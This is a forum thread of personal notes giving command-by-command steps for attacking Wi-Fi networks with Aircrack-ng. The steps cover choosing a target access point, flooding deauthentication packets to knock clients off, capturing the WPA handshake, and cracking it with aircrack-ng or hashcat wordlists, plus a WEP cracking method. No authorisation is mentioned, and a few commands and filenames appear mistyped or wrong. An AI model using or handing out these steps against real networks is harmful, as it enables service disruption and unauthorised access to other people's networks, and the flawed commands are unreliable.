Page 1 of 1

Aircrack-ng

Posted: Mon 31 Oct 31 2016 8:24 pm
by Daniel Wee
1. Ensure the correct chipset is being used - best bet in SG - TP-LINK TL-WN722N

2. Install Aircrack-ng

3. Insert "blacklist wmi" into /etc/modprobe.d/blacklist.conf
- uncertain if this helps anything

4. run "ifconfig -a"
- ascertain interface name
- in my case it wasn't "wlan0" as documents suggest
- it was "wlx18a670d5c25"

5. After starting "sudo airmon-ng start wlx18a670d5c25"
- you might get a message or two asking you to:-
a) sudo airmon-ng check kill
- do this to kill interfering processes
- it is uncertain if this will have any side effect on wpa supplicant functions
b) sudo rfkill unblock the interface name
- however, this is an incorrect instruction
- the correct way is to run "sudo rfkill list" and see which interface is blocked
- then using the NUMBER of the interface, run "sudo rfkill unblock 4" for example
- do this for all blocked interfaces, just to be safe

6. After the last step, the interface "wlx18a670d5c25" will have disappeared from the "ifconfig -a" list
- it is replaced by "wlan0mon" rather than the "mon0" as suggested by documentation

7. run "sudo airmon-ng start wlan0mon"
- this brings up a realtime updated list of beacons received

Re: Aircrack-ng

Posted: Mon 31 Oct 31 2016 10:12 pm
by Daniel Wee
Select from the list the target AP to attack

1. Pick the BSSID MAC address

2. Note the channel that it is listening on

3. run "sudo airodump-ng --bssid XX:XX:XX:XX:XX:XX -c CH --write WPAcrack wlan0mon"
- where XX:XX:XX:XX:XX:XX is the MAC address of the target BSSID
- and CH is the channel number
- this will write to file WPAcrack01.cap if that doesn't exist, or will sequentially increase the number if it does

4. You need to force the user to reconnect to capture the handshake by running "sudo aireplay-ng --deauth 100 -a XX:XX:XX:XX:XX:XX wlan0mon"
- this will force everyone on the AP off
- or you can be more targeted by noting which MAC shows up as connected in airodump-ng
- note the MAC number and run "sudo aireplay-ng --deauth 100 -a XX:XX:XX:XX:XX:XX wlan0mon -c YY:YY:YY:YY:YY:YY"
- where YY:YY:YY:YY:YY:YY is the MAC address of the target client listed on airodump-ng
- in this example 100 is the number of de-authorization packets to send
- you can stop it once the client has been disconnected

5. Wait until airodump-ng shows (at the top line on the right end after the date) "WPA handshake"
- or WEP handshake
- that shows that you've captured a 4-way handshake
- you can stop airodump-ng with a ctrl-C

6. The capture is now in WPAcrack01.cap (or whichever is the last number)
- make sure you have the password list (usually darkc0de.lst or rockyou.txt in your current directory)
- you can crack this with aircrack-ng using "sudo aircrack-ng WPAcrack01.cap -w rockyou.txt"

7. Alternatively, you can use hashcat for GPU powered cracking
- first you will have to clean up the cap file using "sudo wpaclean clean1.cap WPAcrack01.cap"
- this will put the output in clean1.cap
- then you need to convert the format of this file into the hccap format using "sudo aircrack-ng clean1.cap -J finaloutput"
- this creates "finaloutput.hccap" in your current directory

8. Then you can invoke hashcat as follows:
- "../hashcat3.10/hashcat64.bin -m 2500 -a 0 finaloutput.hccap rockyout.txt"
- the first part is really the full path to hashcat64.bin (which also contains hashcat.exe and hascat32.bin)
- the -m determines what kind of code you're cracking. 2500 is WPA/WPA2. Use "hashcat64.bin --help" to show available types
- -a 0 is a straight dictionary attack. -a 3 is the bruteforce attack.

for WEP

Posted: Tue 01 Nov 01 2016 9:13 am
by Daniel Wee
For WEP attacks, the strategy is different.

1. Capture as many packets as possible using "sudo airodump-ng -c CH -bssid XX:XX:XX:XX:XX:XX datafilename wlan0mon"
- this will dump captures into datafilename-01.cap

2. When you can sufficient data, process using "sudo aircrack-ng -z datafilename-01.cap"
- you don't have to stop capturing while doing this
- process it on the fly, but doing so means aircrack-ng will go into waiting mode rather than exiting

rfkill unblock

Posted: Tue 01 Nov 01 2016 9:13 pm
by Daniel Wee
To make life easier than having to always unblock wifi devices, create:-

/etc/systemd/system/rfkill-unblock-wifi.service

Inside it, put the following:-

Code: Select all

[Unit]
Description=RFKill-Unblock WiFi Devices

[Service]
Type=oneshot
ExecStart=/usr/sbin/rfkill unblock wifi
ExecStop=
RemainAfterExit=yes

[Install]
WantedBy=multi-user.target
Then execute the following:-

sudo systemctl enable rfkill-unblock-wifi.service
sudo systemctl start rfkill-unblock-wifi.service